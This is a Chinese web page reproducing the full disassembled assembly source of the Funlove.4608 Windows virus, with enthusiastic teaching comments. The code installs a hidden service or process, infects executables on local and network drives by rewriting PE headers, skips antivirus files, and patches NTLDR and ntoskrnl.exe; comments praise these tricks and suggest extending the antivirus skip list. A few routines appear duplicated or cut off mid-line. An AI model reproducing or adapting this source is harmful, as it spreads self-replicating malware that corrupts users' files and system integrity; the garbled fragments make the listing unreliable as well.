Funlove.4608的源代码
-
;*********************************************************************************************
;Flcss.asm
;
;disasm by Code Demon
;
;Code Demon Virus Dreaming Factory
;
;*********************************************************************************************
.586
ASSUMECS:CODE,DS:CODE
CODESEGMENTUSE32
VSizeequoffsetVEnd - VStart
Phys_VSize equ1000
main:
;*********************************************************************************************
; 开始代码
;*********************************************************************************************
VStart:
callGetDelta;此子程序用于取得病毒在内存中的开始地址,是绝大
;多数病毒都要用到的经典技术只一,对于写一些加密
;的软件有很大的帮助,莱鸟必看
leaesi,[offset HostCode + ebx]
movedi,[esp]
subedi,08
mov[esp],edi
movsd
movsd
pushdword ptr [esp + 04]
callRelocKernel32;重定位Kernel32
oreax,eax
jzshort Exit
cmpbyte ptr [offset OS + ebx],00;判断操作系统的类型
jnzshort NT_Srv
callCreate9xProcess;建立WIN9X进程
ret
NT_Srv:callCreateNTService;建立NT服务
Exit:ret
;*********************************************************************************************
;建立NT服务的子程序
;*********************************************************************************************
CreateNTService:
callRelocAdvapi32
oreax,eax
jzshort CNT_Failed
push02
push00
push00; 取服务管理器的句柄
callOpenSCManagerA
oreax,eax
jzshort CNT_Failed
movSCM_Handle,eax
callCreateExecutable;建立FLCSS.EXE,
oreax,eax; 已经驻留内存就退出.
jzshort CNT_Exit
movedi,0F01FF
leaesi,offset [Service + ebx]
pushedi
pushesi
pushSCM_Handle
callOpenServiceA
oreax,eax
jnzshort CNT_Run
xoreax,eax
pusheax
pusheax
pusheax
pusheax
pusheax
leaeax,[offset Buffer1 + ebx] ;flcss.exe
pusheax
push01;错误代码
push02; 开始
push20; 类型
pushedi
push00
pushesi
pushSCM_Handle;句柄
callCreateServiceA;建立服务
oreax,eax
jzshort CNT_Failed
CNT_Run:
push00
push00
pusheax
callStartServiceA;开始服务
oreax,eax
jnzshort CNT_Exit
CNT_Failed:
callStartInfectionThread ;传染子程序
CNT_Exit:
ret
;*********************************************************************************************
;建立WIN9X进程的子程序
;*********************************************************************************************
Create9xProcess:
;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪.
callCreateExecutable
oreax,eax
jzshort P9x_Exit
P9x_00:
xoreax,eax
leaedi,[offset Buffer2 + ebx]
pushedi
pushedi
movecx,040
repzstosd
movcl,06
pusheax
loop$ - 1
leaesi,[offset Buffer1 + ebx]
pushesi
push00
callCreateProcessA;创建进程
oreax,eax
jnzshort P9x_Exit
P9x_Failed:
callStartInfectionThread;传染子程序
P9x_Exit:
ret
****************************************************************************
;注意了:生成FLCSS.EXE,很多人的机子杀不绝,就是因为它在作怪.
****************************************************************************
CreateExecutable:
leaedi,[offset Buffer1 + ebx]
pushedi
push104
pushedi
callGetSystemDirectoryA;取得系统目录
addedi,eax
moval,'\'
stosb
leaesi,[offset Process + ebx]
movsd
movsd
movsd
push02
callOpenFile
cmpeax,-1
jzshort CE_Exit
movc_FileHandle,eax
leaedi,[offset VImports + ebx];清除 import
moveax,-1
stosd
stosd
leaedi,[offset Kernel32_Relocated + ebx] ;第二个 import
moveax,[edi - 8]
stosd
push00
leaesi,c_BytesWritten
pushesi
push0200
pushebx
pushc_FileHandle
callWriteFile; 写文件头
push00
pushesi
push1000
pushebx
pushc_FileHandle
callWriteFile; 写入病毒主体
pushc_FileHandle
callCloseHandle;关闭文件
CE_Exit:
inceax
ret
;************************************************************************************
;以下应该是病毒的服务程序
;************************************************************************************
VService:
callGetDelta
pushdword ptr [esp]
callRelocKernel32
oreax,eax
jzVS_Exit
cmpbyte ptr [offset OS + ebx],00;操作系统的类型
jzshort W9x_Service_Register;注册WIN9X服务
WNT_Service_Hacknowledge:
callRelocAdvapi32;重定位Advapi32
oreax,eax
jzVS_Exit
leaesi,[offset Buffer1 + ebx]
xoreax,eax
leaecx,[offset Service + ebx]
leaedx,[offset ServiceDispatcher + ebx]
mov[esi],ecx
mov[esi + 04],edx
mov[esi + 08],eax
mov[esi + 0C],eax; 将控制权返回给调用者
pushesi
callStartServiceCtrlDispatcherA
W9x_Service_Register:
leaesi,[offset USER32_Name + ebx]
pushesi
callLoadLibraryA
leaesi,[offset RegisterClassA+ ebx]
pushesi
pusheax
callGetProcAddress;取进程的地址
oreax,eax
jzshort VS_00
mov[esi - 06],eax
leaesi,[offset Buffer1 + ebx]
movedi,esi
xoreax,eax
movecx,0A
repzstosd
movdword ptr [esi + 04],-1
movdword ptr [esi + 10],400000; WINDOWS9X的基址
leaeax,[offset Service + ebx]
mov[esi + 24],eax
pushesi
callRegisterClassA; 这里非常重要
leaesi,[offset RegisterServiceProcess+ ebx]
pushesi
pushdword ptr [offset Kernel32_Base + ebx]
callGetProcAddress
oreax,eax
jzshort VS_00
mov[esi - 06],eax
callGetCurrentProcessId;取当前进程的ID
; 注册为服务
callGetCurrentProcessId;取当前进程的ID
; 注册为服务进程,防止被用户
push01;用CTRL+ALR+DEL从任务管理器中发现
pusheax
callRegisterServiceProcess
push8000; 延时
callSleep
VS_00:
callStartInfectionThread
VS_Exit:
ret
;*********************************************************************************************
;NT服务子程序
;*********************************************************************************************
ServiceDispatcher:
callGetDelta
leaesi,[offset ServiceHandler + ebx]
leaedi,[offset Service + ebx]
pushesi
pushedi
callRegisterServiceCtrlHandlerA
movService_Handle,eax
leaesi,[offset Buffer1 + ebx]
movedi,esi
movecx,06
xoreax,eax
repzstosd
movdword ptr [esi],10
movdword ptr [esi + 04],04
movdword ptr [esi + 08],07
pushesi
pushService_Handle;告诉WINDOWS服务已经正确的运行
callSetServiceStatus
push8000
callSleep
callStartInfectionThread;建立进程
ret
ServiceHandler:
ret; 当管理员关闭服务时,提示系统出错!好东西!!!
;*********************************************************************************************
;此子程序用于建立线程
;*********************************************************************************************
StartInfectionThread:
callGetTickCount
mov[offset Rand + ebx],eax
leaeax,ThreadId
pusheax
push0
push0
leaeax,[offset VThread + ebx]
pusheax
push0
push0
callCreateThread
ret
;*********************************************************************************************
; 病毒线程
;*********************************************************************************************
VThread:
callGetDelta
callInfectDrives;感染本地文件
push60000
callSleep
callGetRand
andal,1F
jnzshort VThread
callInfectNetwork;感染网络文件
jmpshort VThread
;********************************************************************************
; 通过网络传染的子程序,值得借鉴
;********************************************************************************
InfectNetwork:
leaeax,[offset MPR_Name + ebx]
pusheax
callLoadLibraryA
oreax,eax
jzshort INet_Failed
pusheax
leaesi,[offset MPR_Functions + ebx]
pushesi
callDLL_Relocate
oreax,eax
jzshort INet_Failed
push00
callNetSearch
INet_Failed:
ret
;*********************************************************************************************
; 此子程序用于测试驱动器是否有效
;*********************************************************************************************
InfectDrives:
pushesi
callGetTickCount
mov[offset Tick + ebx],eax
leaesi,[offset Buffer1 + ebx]
movdword ptr [esi],' \:+ ebx - offset VStart'
ID_TestDrive:
movbyte ptr [esi + 03],00
pushesi
callGetDriveTypeA;取驱动器类型
cmpal,03;硬盘?
jzshort ID_DriveOk
cmpal,04;网络驱动器?
jnzshort ID_Invalid
ID_DriveOk:
addesi,03
pushesi
callBlownAway
pushesi
callFileSearch;查找文件
subesi,03
ID_Invalid:
moval,[offset Buffer1 + ebx]
incal
mov[offset Buffer1 + ebx],al
cmpal,'Z'
jnashort ID_TestDrive
popesi
ret
;*********************************************************************************************
;查找计算机
;*********************************************************************************************
NetSearch :
movEnumBufferSize,4000
orEnumNB_Objects,-1
leaeax,WNetStructAddr
pusheax
pushWNetStructAddr
push0
push0
push2
callWNetOpenEnumA
oreax,eax
jnzNET_Close
push04
push1000
push4000
push00
callVirtualAlloc
oreax,eax
jzshort NET_Close
movEnumBufferAddr,eax
NET_00:
movesi,EnumBufferAddr
leaeax,EnumBufferSize
pusheax
pushesi
leaeax,EnumNB_Objects
pusheax
pushWNetStructAddr
callWNetEnumResourceA
oreax,eax
jnzshort NET_Free
movecx,EnumNB_Objects
orecx,ecx
jzshort NET_00
NET_01:
pushecx
pushesi
movesi,[esi + 14]; 计算机名
oresi,esi
jzshort NET_03
cmpword ptr [esi],0041; 是否为软盘
jzshort NET_03
leaedi,[offset Buffer1 + ebx]
NET_02:
movsb
cmpbyte ptr [esi],00
jnzshort NET_02
moval,'\'
stosb
pushedi
callBlownAway
pushedi
callFileSearch
NET_03:
popesi
moveax,[esi + 0C]
andal,2
cmpal,2
jnzshort NET_04
pushesi
callNetSearch
NET_04:
addesi,20
popecx
loopNET_01
jmpshort NET_00
NET_Free:
push8000
push00
pushEnumBufferAddr
callVirtualFree
NET_Close:
pushWNetStructAddr
callWNetCloseEnum
ret
;*************************************************************************************
; 查找文件子程序,这些跟以前DOS下没什么区别,
;
; 我还是喜欢用IFS_HOOK,可以做到全隐形哦,那感觉就是一个字--爽!^_^
;*************************************************************************************
FileSearch:
moveax,CurrentDirEnd
movdword ptr [eax],002A2E2A; *.*
leaedi,[offset Buffer2 + ebx]
leaesi,[offset Buffer1 + ebx]
pushedi
pushesi
callFindFirstFileA;找第一个文件
cmpeax,-1
jzshort RS_Exit
RS_00:
movSearchHandle,eax
RS_01:
testbyte ptr [edi],10; 测试是目录还是文件
jzshort FileTest
RS_Directory:
cmpbyte ptr [edi + 2C],'.'
jzshort RS_Next
movesi,edi
addesi,2C
movedi,CurrentDirEnd
RSD_00:
movsb
cmpbyte ptr [esi],0
jnzshort RSD_00
moval,'\'
stosb
pushedi
callFileSearch
RS_Next:
leaedi,[offset Buffer2 + ebx]
pushedi
pushSearchHandle
callFindNextFileA;查找下一个文件
oreax,eax
jnzshort RS_01
pushSearchHand
RS_Next:
leaedi,[offset Buffer2 + ebx]
pushedi
pushSearchHandle
callFindNextFileA;查找下一个文件
oreax,eax
jnzshort RS_01
pushSearchHandle
callFindClose
RS_Exit:
ret
;********************************************************************
;没什么新意,略过吧
;********************************************************************
FileTest:
movedx,[edi + 2C]
oredx,20202020
xoredx,61F81F61
leaesi,[offset SkipNames + ebx] ; 跳过一些反病毒软件的感染
movecx,0C
FT_00:
lodsd
cmpedx,eax
jzshort FT_Exit
loopFT_00
;************************************************************************
;注意拉,
;************************************************************************
movesi,edi
addesi,2C
FT_01:
lodsb
oral,al
jnzshort FT_01
moveax,[esi - 4]; 扩展名判断
oreax,20202020
cmpeax,' xco';控件
jzshort FT_02
cmpeax,' rcs';屏幕保护文件
jzshort FT_02
cmpeax,' exe';标准的EXE文件
jnzshort FT_Exit
FT_02:
moveax,[edi + 20]; 文件小于2000的就不感染
cmpeax,2000
jcshort FT_Exit
cmpal,03; 检测是否已经感染
jzshort FT_Exit
leaesi,[offset Buffer1 + ebx]; 取文件名和路径
leaedi,[offset Buffer3 + ebx]
pushedi
movecx,CurrentDirEnd
subecx,esi
repzmovsb
leaesi,[offset Buffer2 + ebx]
addesi,2C
FT_03:
movsb
cmpbyte ptr [esi - 1],0
jnzshort FT_03
callInfectFile;干活了,
FT_Exit:
jmpRS_Next
;*****************************************************************************************
;感染文件子程序
;*****************************************************************************************
InfectFile:
pushi_Filename
push03; 打开文件
callOpenFile
cmpeax,-1
jzIN_Exit
movi_FileHandle,eax
push00
pusheax
callGetFileSize;取文件大小,用于以后还原
movi_FileSize,eax
cmpal,03; 是否感染
jzIN_Exit
leaedi,[offset Buffer3 + ebx]
push00
leaesi,i_BytesRead
pushesi
push2000
pushedi
pushi_FileHandle
callReadFile
;*********************************************************************************
;以下的程序跟文件头有关,建议没基础者找一些相关资料看看
;*********************************************************************************
cmpword ptr [edi],5A4Dh;DOS文件头,开始有点印象了吧
jnzIN_CloseFile
cmpword ptr [edi + 18],0040;是否为WINDOWS文件,此处>=40H,则为WINDOWS文件,<40H则为DOS文件
jnzIN_CloseFile
cmpdword ptr [edi + 3C],1C00; DOS文件头的大小
jaIN_CloseFile
addedi,[edi + 3C];指向PE或NE文件头
moveax,[edi]
cmpeax,00004550;PE文件吗?
jnzIN_CloseFile;此步必须,因为WIN3.X的18H的值也大于等于40H
cmpword ptr [edi + 5C],2; GUI????
jnzIN_CloseFile
movesi,edi
addesi,18
addsi,[edi + 14]; 将ESI指向第一个节表
pushesi
moveax,[edi + 28]; 查找包含"PE"的节表
IN_00:
movecx,[esi + 0C]
addecx,[esi + 08]
cmpeax,ecx
jcshort IN_01
addesi,28
jmpshort IN_00
IN_01:
subeax,[esi + 0C]
addeax,[esi + 14]
movi_EP_Offset,eax
or[esi + 24],80000000; 将它改为可写,这里是WINDOWS跟
;DOS在程序和数据段上的一个重要改变
;也是写WINDOWS病毒要注意的地方之一
popesi
xorecx,ecx
movcx,[edi + 06]
dececx
moveax,ecx
movedx,28
muledx
addesi,eax; ESI指向最后一个节表
moveax,[esi + 24]
cmpal,80; 是否已经初始化
jzIN_CloseFile
oreax,8C000000; 将它改为可写,
andeax,not 12000000; 不共享,不可丢弃
mov[esi + 24],eax
movecx,i_FileSize;这里好象跟SFX有点关系
movedx,ecx
moveax,ecx
clc
shreax,03
subedx,eax
subedx,[esi + 14]
jcshort IN_02
subedx,[esi + 10]
jncIN_CloseFile
IN_02:; 重新计算节的长度
movedx,[esi + 08]
subecx,[esi + 14]
jcshort IN_03
cmpedx,ecx
jashort IN_03
movedx,ecx
IN_03:
testedx,00000FFF
jzshort IN_04
andedx,0FFFFF000
addedx,1000
IN_04:
movecx,edx
addecx,[esi + 0C]
moveax,ecx
addeax,4000
mov[edi + 50],eax; 新的长度
subecx,[edi + 28]
addecx,offset VStart - 100 - 08
movi_HostDep32,ecx
moveax,edx
addeax,4000; 改变虚拟大小
mov[esi + 08],eax
moveax,edx
addeax,[esi + 14]
movi_VirusOffset,eax
addedx,1000; 改变物理大小
mov[esi + 10],edx
addedx,[esi + 14]
addedx,03
pushi_FileHandle
pushedx
callMapFile
oreax,eax
jzshort IN_CloseFile
movi_MapHandle,eax
pusheax
callViewMap
oreax,eax
jzshort IN_CloseMap
movedx,eax
leaesi,[offset Buffer3 + ebx]; 写PE文件头
movedi,edx
movecx,2000
repzmovsb
leaedi,[offset HostCode + ebx]
movesi,i_EP_Offset
addesi,edx
movsd
movsd
movedi,esi; 设置CALL GS:Virus
subedi,08
moveax,00E8659090
stosd
moveax,i_HostDep32
stosd
movedi,edx
moveax,i_FileSize
movecx,i_VirusOffset
subecx,eax
jnashort IN_05
addedi,eax
xoral,al
repzstosb
IN_05:
movesi,ebx;写入病毒主体
movedi,edx
addedi,i_VirusOffset
movecx,VSize
repzmovsb
movecx,Phys_VSize - VSize + 3
repzstosb
pushedx
callUnmapViewOfFile
IN_CloseMap:
pushi_MapHandle
callCloseHandle;关闭
callWait_A_Little;延时
IN_CloseFile:
leaesi,[offset Buffer2 + 14 + ebx]; 恢复文件的时间
pushesi
subesi,08
pushesi
subesi,08
pushesi
pushi_FileHandle
callSetFileTime
pushi_FileHandle
callCloseHandle;关闭文件
IN_Exit:
ret
;********************************************************************************
; 查找GetProcAddress 的子程序
;********************************************************************************
Whereis_GPA:
leaesi,[offset GPA_Sigs + ebx]
movbyte ptr [offset OS + ebx],00
moveax,w_Kernel32
andeax,0FFF00000
cmpeax,0BFF00000
jnzshort OS_WinNT?
OS_Win9x:
movedi,0BFF70000
jmpshort WG_00
OS_WinNT?:
incbyte ptr [offset OS + ebx]
addesi,08
cmpeax,077F00000
jnzshort OS_Win2K?
movedi,eax
jmpshort WG_00
OS_Win2K?:
incbyte ptr [offset OS + ebx]
addesi,08
cmpeax,077E00000
jnzshort WG_Failed
movedi,077E80000
WG_00:
movedx,edi
movecx,20000
WG_01:
pushecx
movecx,08
pushesi
pushedi
repzcmpsb
popedi
popesi
popecx
jzshort WG_02
incedi
loopWG_01
WG_Failed:
xoreax,eax
jmpshort WG_03
WG_02:
addedi,03
mov[offset GetProcAddress + 1 + ebx],edi
moveax,edx
mov[offset Kernel32_Base + ebx],eax
WG_03:
ret
;***************************************************************************************
;DLL 重定位子程序
;***************************************************************************************
DLL_Relocate:
movesi,DLL_Func
DR_00:
moveax,esi
addeax,07
pusheax
pushDLL_Base
callGetProcAddress
oreax,eax
jzshort DR_03
DR_01:
mov[esi + 1],eax
addesi,07
DR_02:
lodsb
oral,al
jnzshort DR_02
cmpbyte ptr [esi],0B8
jzshort DR_00
DR_03:
ret
;**********************************************************************************************
; 修改NTLDR,这可是Funlove的必杀技噢,虽然我不喜欢这种做法,但还是看看吧
;**********************************************************************************************
BlownAway:
leaesi,[offset NTLDR + ebx]
movedi,DirEnd
movsd
movsd
leaedi,[offset Buffer1 + ebx]
leaesi,[offset NT4_NTLDR + ebx]
cmpbyte ptr [offset OS + ebx],01
jzshort BA_00
addesi,10
BA_00:
pushedi
pushesi
push05
callPatchFile
leaesi,[offset NTOSKRNL + ebx]
movedi,DirEnd
BA_01:
movsb
cmpbyte ptr [esi - 1],00
jnzshort BA_01
leaedi,[offset Buffer1 + ebx]
leaesi,[offset NT4_NTOSKRNL + ebx]
cmpbyte ptr [offset OS + ebx],01
jzshort BA_02
addesi,18
BA_02:
pushedi
pushesi
push09
callPatchFile
ret
PatchFile:
pushp_Filename
push03; 打开文件
callOpenFile
cmpeax,-1
jzshort PA_Exit
movp_FileHandle,eax
push00
pusheax
callGetFileSize;取文件大小
movp_FileSize,eax
pushp_FileHandle
pusheax
callMapFile
oreax,eax
jzshort PA_CloseFile
movp_MapHandle,eax
pusheax
callViewMap
oreax,eax
jzshort PA_CloseMap
movedx,eax
movedi,eax
movesi,p_PatchAddr
movecx,p_FileSize
PA_00:
pushecx
pushesi
pushedi
movecx,p_PatchSize
repzcmpsb
popedi
popesi
popecx
jzshort PA_01
incedi
loopPA_00
jmpshort PA_Unmap
PA_01:
movecx,p_PatchSize
addesi,ecx
repzmovsb
PA_Unmap:
pushedx
callUnmapViewOfFile
PA_CloseMap:
pushp_MapHandle
callCloseHandle
PA_CloseFile:
pushp_FileHandle
callCloseHandle;关闭文件
PA_Exit:
ret
;**********************************************************************************************
;此子程序用于取病毒在内存中的开始地址,经典技术
;**********************************************************************************************
GetDelta:
calldelta
delta:
popebx
subebx,offset delta - VStart
ret
;**********************************************************************************************
;以下应该是重定位Kernel32的子程序,WINDOWS病毒惯用的手法
;**********************************************************************************************
RelocKernel32:
pushr_Kernel32
callWhereis_GPA
oreax,eax
jzshort RK_00
pusheax
leaesi,[offset Kernel32_Functions + ebx]
pushesi
callDLL_Relocate
RK_00:
ret
;**********************************************************************************************
; 以下是重定位Advapi32的子程序
;**********************************************************************************************
RelocAdvapi32:
leaeax,[offset ADVAPI32_Name + ebx]
pusheax
callLoadLibraryA
oreax,eax
jzshort RA_00
pusheax
leaesi,[offset ADVAPI32_Functions + ebx]
pushesi
callDLL_Relocate
RA_00:
ret
;**********************************************************************************************
; 打开文件子程序
;**********************************************************************************************
OpenFile:
push20
pusho_Filename
callSetFileAttributesA
push00
push80; 普通属性
pusho_OpenMode
push00
push00; 不共享,
push0C0000000; 读写方式
pusho_Filename
callCreateFileA
ret
;**********************************************************************************************
; 建立文件影象,找点资料看看吧
;**********************************************************************************************
MapFile:
push00
pushm_FileSize
push00
push04
push00
pushm_FileHandle
callCreateFileM
;**********************************************************************************************
; 建立文件影象,找点资料看看吧
;**********************************************************************************************
MapFile:
push00
pushm_FileSize
push00
push04
push00
pushm_FileHandle
callCreateFileMappingA
ret
ViewMap:
push00
push00
push00
push02
pushv_MapHandle
callMapViewOfFile
ret
;**********************************************************************************************
; 延时,没什么说的了
;**********************************************************************************************
Wait_A_Little:
callGetTickCount
subeax,[offset Tick + ebx]
cmpeax,4000
jcshort WAL_00
push16000
callSleep
callGetTickCount
mov[offset Tick + ebx],eax
WAL_00:
ret
GetRand:
pushecx
pushedx
moveax,[offset Rand + ebx]
xoredx,edx
movecx,7FFFFFFF
mulecx
inceax
movecx,0FFFFFFFBh
divecx
moveax,edx
mov[offset Rand + ebx],eax
popedx
popecx
ret
;**********************************************************************************************
;以下是一些数据
;**********************************************************************************************
HostCode db8 dup (?)
GPA_Sigs:
W9xdb0C2,04,00,57,6A,22,2Bh,0D2
NT4db0C2,04,00,55,8Bh,4C,24,0C
W2Kdb00F,00,00,55,8Bh,0ECh,51,51
NTLDRdb'NTLDR',0
NT4_NTLDR db3Bh,46,58,74,07;WINDOWS_NT4的NTLDR的标志
db3Bh,46,58,0EBh,07
W2K_NTLDR db3Bh,47,58,74,07
db3Bh,47,58,0EBh,07;WIN2K的NTLDR的标志
NTOSKRNL db'WINNT\System32\ntoskrnl.exe',0
NT4_NTOSKRNL db8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ;标志
db0B0,01,5F,5E,5Bh,5Dh,0C2,28,00
W2K_NTOSKRNL db8A,45,14,5F,5E,5Bh,5Dh,0C2,28;同上
db0B0,01,90,5F,5E,5Bh,5Dh,0C2,28
;**********************************************************************************************
;以下是一些杀毒软件的文件不感染,你可以加点国产的杀毒软件的名字,
;**********************************************************************************************
SkipNames:
dd139D7300h ; aler
dd0F977200h ; amon
dd118E7E1Eh ; _avp
dd52886900h ; avp3
dd0C886900h ; avpm
dd13883207h ; f-pr
dd168E7E0Fh ; navw
dd0F997C12h ; scan
dd128B7212h ; smss
dd04907B05h ; ddhe
dd00946F05h ; dpla
dd00946F0Ch ; mpla
Process db'flcss.exe',0
Service db'FLC',0
; Import节表
VImports:
ddoffset Kernel32_Pointers
dd-1,-1
ddoffset Kernel32_Name
ddoffset Kernel32_Relocated
db14 dup (0)
Kernel32_Pointersddoffset Kernel32_Beep
Kernel32_Relocatedddoffset Kernel32_Beep
Kernel32_Beepdb?,?,'Beep',0
;*********************************************************************************************
; 病毒要调用的一些API,找点资料啃一啃吧,MASM32里的INC文件你能啃完的话,你就是绝顶高手了,
;
; 注: 绝顶高手--------没有头发的高手
;*********************************************************************************************
Kernel32_Namedb'KERNEL32.dll',0
Kernel32_Functions:
CloseHandle:db0B8,4 dup(?),0FF,0E0,'CloseHandle',0
CreateFileA:db0B8,4 dup(?),0FF,0E0,'CreateFileA',0
CreateFileMappingA: db0B8,4 dup(?),0FF,0E0,'CreateFileMappingA',0
CreateProcessA:db0B8,4 dup(?),0FF,0E0,'CreateProcessA',0
CreateThread:db0B8,4 dup(?),0FF,0E0,'CreateThread',0
FindFirstFileA:db0B8,4 dup(?),0FF,0E0,'FindFirstFileA',0
FindNextFileA:db0B8,4 dup(?),0FF,0E0,'FindNextFileA',0
FindClose:db0B8,4 dup(?),0FF,0E0,'FindClose',0
GetCurrentProcessId: db0B8,4 dup(?),0FF,0E0,'GetCurrentProcessId',0
GetDriveTypeA:db0B8,4 dup(?),0FF,0E0,'GetDriveTypeA',0
GetFileSize:db0B8,4 dup(?),0FF,0E0,'GetFileSize',0
GetProcAddress:db0B8,4 dup(?),0FF,0E0,'GetProcAddress',0
GetTickCount:db0B8,4 dup(?),0FF,0E0,'GetTickCount',0
GetSystemDirectoryA: db0B8,4 dup(?),0FF,0E0,'GetSystemDirectoryA',0
LoadLibraryA:db0B8,4 dup(?),0FF,0E0,'LoadLibraryA',0
MapViewOfFile:db0B8,4 dup(?),0FF,0E0,'MapViewOfFile',0
ReadFile:db0B8,4 dup(?),0FF,0E0,'ReadFile',0
SetFileAttributesA: db0B8,4 dup(?),0FF,0E0,'SetFileAttributesA',0
SetFileTime:db0B8,4 dup(?),0FF,0E0,'SetFileTime',0
Sleep:db0B8,4 dup(?),0FF,0E0,'Sleep',0
UnmapViewOfFile:db0B8,4 dup(?),0FF,0E0,'UnmapViewOfFile',0
VirtualAlloc:db0B8,4 dup(?),0FF,0E0,'VirtualAlloc',0
VirtualFree:db0B8,4 dup(?),0FF,0E0,'VirtualFree',0
WriteFile:db0B8,4 dup(?),0FF,0E0,'WriteFile',0
;注:下面的API在WIN9X中是没有的
db0
RegisterServiceProcess: db0B8,4 dup(?),0FF,0E0,'RegisterServiceProcess',0
USER32_Namedb'USER32.dll',0
RegisterClassA:db0B8,4 dup(?),0FF,0E0,'RegisterClassA',0
ADVAPI32_Namedb'ADVAPI32.dll',0
ADVAPI32_Functions:
OpenSCManagerA:db0B8,4 dup(?),0FF,0E0,'OpenSCManagerA',0
OpenServiceA:db0B8,4 dup(?),0FF,0E0,'OpenServiceA',0
CreateServiceA:db0B8,4 dup(?),0FF,0E0,'CreateServiceA',0
StartServiceA:db0B8,4 dup(?),0FF,0E0,'StartServiceA',0
StartServiceCtrlDispatcherA: db0B8,4 dup(?),0FF,0E0,'StartServiceCtrlDispatcherA',0
RegisterServiceCtrlHandlerA: db0B8,4 dup(?),0FF,0E0,'RegisterServiceCtrlHandlerA',0
SetServiceStatus:db0B8,4 dup(?),0FF,0E0,'SetServiceStatus',0
MPR_Namedb'MPR.dll',0
MPR_Functions:
WNetOpenEnumA:db0B8,4 dup(?),0FF,0E0,'WNetOpenEnumA',0
WNetEnumResourceA:db0B8,4 dup(?),0FF,0E0,'WNetEnumResourceA',0
WNetCloseEnum:db0B8,4 dup(?),0FF,0E0,'WNetCloseEnum',0
;病毒应该是在这里就结束了
vend:
Kernel32_Basedd?
Randdd?
Tickdd?
OSdb?
ALIGN100
Buffer1 db200 dup (0); 此处应该是用于存放当前目录
Buffer2 db200 dup (?)
Buffer3 db2000 dup (?);此处用于存放读入的文件
CODEENDS
ENDmain
相关视频
相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么
- 文章评论
-
热门文章 没有查询到任何记录。
最新文章
火球病毒是什么意思 火
360保险箱如何保护程序
安卓手机病毒Android.KungFu来袭 用户小心流lpk.dll是什么病毒_lpk.dll病毒专杀方法BMW病毒技术深入分析“图片大盗”通过聊天传播 专盗网游账号
人气排行 eset nod32序列号 nod32升级id 2009年8月28lpk.dll是什么病毒_lpk.dll病毒专杀方法最厉害病毒排行榜职业盗号的基本流程试图连接本机的IP端口,该操作被拒绝VBS病毒制造机v1.0 分析报告360保险箱如何保护程序和游戏账号中搜.桌面传媒Deskipn专杀彻底删除办法
查看所有17条评论>>